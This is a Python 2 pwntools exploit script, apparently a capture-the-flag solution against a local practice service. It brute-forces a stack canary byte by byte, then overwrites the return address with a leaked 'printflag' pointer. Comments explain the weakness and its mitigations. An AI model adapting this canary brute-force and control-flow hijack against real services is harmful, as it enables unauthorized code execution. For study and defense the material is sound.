# Byte-at-a-time recovery of an 8-byte stack value from a local test service
# (127.0.0.1:2345), followed by one final send that places the service's own
# leaked "printflag" pointer after the recovered value.  The 8-byte value is
# never named here; the commented-out p64(0xead62b27d92cf000) reads like a
# stack-protector canary (low byte 0x00) -- presumably that is what is being
# recovered, confirm against the binary.
#
# Python 2 / pwntools script: ``print ".",`` is Python 2 print-statement
# syntax, and buf is built as a str and sent directly.
#
# Why the per-byte search works, from a defender's point of view: the service
# gives two distinguishable outcomes for a write that clobbers one more byte --
# a "Wrong!" reply when the guessed byte matches what was there, or a dropped
# connection when it does not -- and the value is assumed to be identical across
# connections (typical of a forking server that never re-randomizes it).
# Removing either property (per-connection randomization, no distinguishable
# reply after a detected overflow, not printing code pointers) defeats it.

from pwn import *

# Silence pwntools' per-connection logging; the loop opens up to 8*256 sockets.
context.log_level = 'error'

offset = 32   # filler bytes before the 8 "B" bytes; 40 bytes total precede the value being recovered
y = 0         # unused
# Filler only at this point; the commented-out tail is a previously observed
# value kept for reference and is not part of what is sent.
buf = ("A"*offset + "B"*8) #+ p64(0xead62b27d92cf000) # +chr(0)+chr(191)+chr(217)+chr(151)+chr(59)+chr(107)+chr(161)+chr(22)
i=0           # candidate for the byte currently being recovered (0..0xff)
g=0           # number of bytes recovered and appended to buf so far
# Stop after 8 bytes, or as soon as one position has exhausted all 256
# candidates without ever seeing "Wrong!" (i only reaches 0x100 on that path).
# NOTE(review): in the exhausted case the final send below still runs with an
# incomplete buf; nothing checks g == 8 first.
while i != 0x100 and g<8:
    r = remote('127.0.0.1', 2345)
    # The service prints a code pointer on every connection; it is parsed here
    # but only used in the final send after the loop.
    r.recvuntil("Pointer to printflag is 0x")
    addr = int(r.recvuntil("\n"), 16)
    #print("Pointer is %x" % addr)
    # Filler + bytes recovered so far + one guessed byte.
    exploit = buf + chr(i) #+ p64(addr)
    r.send(exploit)
    try:
        # A "Wrong!" reply means the service survived the write, i.e. the
        # guessed byte equals the byte that was there: keep it and move on
        # to the next position.
        r.recvuntil("Wrong!")
        buf = buf + chr(i)
        print(str(i))
        i=0
        g=g+1
    except:
        # Bare except: any failure (presumably EOFError when the service
        # closes the connection after the value is corrupted) is taken as
        # "guess was wrong".  An unrelated error -- a timeout, a refused
        # connection -- is swallowed the same way and counted as a miss.
        print ".",
        i=i+1
    r.close()

# Final connection: recovered buf, then the leaked pointer twice.
# NOTE(review): the two copies presumably cover the saved frame pointer and
# the return address -- confirm against the binary's frame layout.
r = remote('127.0.0.1', 2345)
stdout = r.recvuntil("Pointer to printflag is 0x")
addr = int(r.recvuntil("\n"), 16)
print("Pointer is %x" % addr)
exploit = buf + p64(addr) + p64(addr)
print(exploit)
r.send(exploit)
print(r.recv())